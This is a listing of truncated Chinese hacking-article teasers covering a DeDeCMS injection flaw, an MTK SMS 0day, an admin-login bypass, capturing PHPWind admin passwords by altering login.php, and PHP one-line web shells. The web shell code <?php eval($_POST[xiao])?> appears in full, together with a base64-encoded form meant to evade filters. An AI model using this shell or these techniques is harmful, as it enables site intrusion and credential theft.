-
DeDeCMS v5.7最新ajax_membergroup.php注入漏洞
DeDeCMS(织梦CMS)是一款国内比较专业的PHP网站内容管理系统,从04年发行至今,已近七个年头,也经历了无数次的升级和改版,最新版本为8月12更新的V5.7正式版,功能也不断增强。笔者原本以为这应该是一款安全性比较高的CMS系统,然...
-
MTK手机短信漏洞大曝光0day
最近很热闹的事情就是MTK手机短信漏洞的曝光,由于购买使用MTK方案的手机现在在市场上占有不小的比重,而且此漏洞几乎对所有MTK手机都有效,个人用户基本不能防止或者补救,所以受影响的范围非常广。经过多方搜集整理,还有本人的测试,果然发现此漏...
-
最土团购网 BYPASS登录后台0day
1:后台地址manage/login.php 2.右键查看源代码。找到以下代码: <div><labelfor="manage-login">登录名</label><inputt...
-
PHPWIND得到管理员密码的方法
有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?在登录文件做手脚啊...我来贴一个我修改的.login.php里面替换掉对应的部分就OK了. [Copy to clipboard] [ - ]CODE:if($actio...
-
php一句话猥琐流搞法
在渗透中常常遇到拦截eval的,所以<?php eval($_POST[xiao])?>这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式...
